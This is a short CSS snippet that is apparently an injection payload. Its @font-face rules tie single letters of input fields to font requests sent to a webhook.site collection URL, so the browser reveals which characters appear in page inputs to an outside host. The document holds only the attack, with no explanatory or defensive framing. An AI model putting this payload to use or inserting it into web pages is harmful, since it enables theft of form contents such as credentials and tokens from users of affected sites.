@font-face { font-family: x; src: url(https://webhook.site/63b7a012-f7c5-44f8-8a8f-4d683f11a55b?KEY=a), local(Impact); unicode-range: U+61; }
@font-face { font-family: x; src: url(https://webhook.site/63b7a012-f7c5-44f8-8a8f-4d683f11a55b?KEY=b), local(Impact); unicode-range: U+62; }
@font-face { font-family: x; src: url(https://webhook.site/63b7a012-f7c5-44f8-8a8f-4d683f11a55b?KEY=c), local(Impact); unicode-range: U+63; }
@font-face { font-family: x; src: url(https://webhook.site/63b7a012-f7c5-44f8-8a8f-4d683f11a55b?KEY=d), local(Impact); unicode-range: U+64; }
input { font-family: x, 'Comic sans ms'; }
